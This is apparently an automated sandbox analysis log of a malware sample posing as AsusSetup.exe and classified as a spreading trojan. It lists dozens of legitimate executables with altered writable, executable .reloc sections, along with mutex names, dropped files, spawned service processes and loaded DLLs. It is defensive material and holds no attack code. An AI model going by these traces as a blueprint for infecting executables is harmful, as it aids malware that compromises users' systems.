Source: OneDriveSetup.exe.2.dr Static PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 47694794 bytes, 767 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 6100 datablocks, 0x1503 compression
Source: msedgewebview2.exe.2.dr Static PE information: Number of sections : 14 > 10
Source: msedge_proxy.exe0.2.dr Static PE information: Number of sections : 12 > 10
Source: msedge_pwa_launcher.exe.2.dr Static PE information: Number of sections : 13 > 10
Source: pwahelper.exe0.2.dr Static PE information: Number of sections : 12 > 10
Source: identity_helper.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe.0.dr Static PE information: Number of sections : 12 > 10
Source: pwahelper.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.2.dr Static PE information: Number of sections : 11 > 10
Source: notification_click_helper.exe.2.dr Static PE information: Number of sections : 13 > 10
Source: elevation_service.exe0.0.dr Static PE information: Number of sections : 12 > 10
Source: setup.exe.2.dr Static PE information: Number of sections : 13 > 10
Source: AsusSetup.exe, 00000000.00000003.1698610449.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameALG.exej% vs AsusSetup.exe
Source: AsusSetup.exe, 00000000.00000003.1693381638.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamearmsvc.exeN vs AsusSetup.exe
Source: AsusSetup.exe, 00000000.00000003.1715092599.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs AsusSetup.exe
Source: unknown Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Source: AsusSetup.exe Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroTextExtractor.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADelRCP.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateSetup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate32.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVLP.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OneDriveSetup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADNotificationManager.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeCollabSync.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WCChromeNativeMessagingHost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CRLogTransport.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: CRWindowsClientService.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Eula.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine | Classification label: mal96.spre.troj.expl.winEXE@6/129@93/19
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\Desktop\AsusSetup.exe | File created: C:\Users\user\AppData\Roaming\26169d80e67cd874.bin
Source: C:\Windows\System32\alg.exe | Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-26169d80e67cd8749ea72c54-b
Source: C:\Users\user\Desktop\AsusSetup.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-26169d80e67cd8747d8e3ee9-b
Source: C:\Users\user\Desktop\AsusSetup.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-26169d80e67cd874-inf
Source: C:\Windows\System32\FXSSVC.exe | File created: C:\Windows\TEMP\FXSSVCDebugLogFile.txt
Source: C:\Users\user\Desktop\AsusSetup.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AsusSetup.exe | String found in binary or memory: </LAUNCH_ICON>
Source: AsusSetup.exe | String found in binary or memory: </LAUNCH_BTN>
Source: unknown | Process created: C:\Users\user\Desktop\AsusSetup.exe "C:\Users\user\Desktop\AsusSetup.exe"
Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown | Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown | Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown | Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: oledlg.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: newdev.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: devobj.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: devrtl.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\AsusSetup.exe | Section loaded: webio.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\alg.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\alg.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\alg.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\alg.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\alg.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\alg.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\alg.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\alg.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\alg.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\alg.exe | Section loaded: webio.dll
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exe, Section loaded: drprov.dll
Source: C:\Windows\System32\alg.exe, Section loaded: winsta.dll
Source: C:\Windows\System32\alg.exe, Section loaded: ntlanman.dll
Source: C:\Windows\System32\alg.exe, Section loaded: davclnt.dll
Source: C:\Windows\System32\alg.exe, Section loaded: davhlpr.dll
Source: C:\Windows\System32\alg.exe, Section loaded: wkscli.dll
Source: C:\Windows\System32\alg.exe, Section loaded: cscapi.dll
Source: C:\Windows\System32\alg.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\alg.exe, Section loaded: browcli.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: appvpolicy.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: wtsapi32.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: netapi32.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: wininet.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: samcli.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: logoncli.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: winhttp.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: mpr.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: dnsapi.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: profapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: kernel.appcore.dll
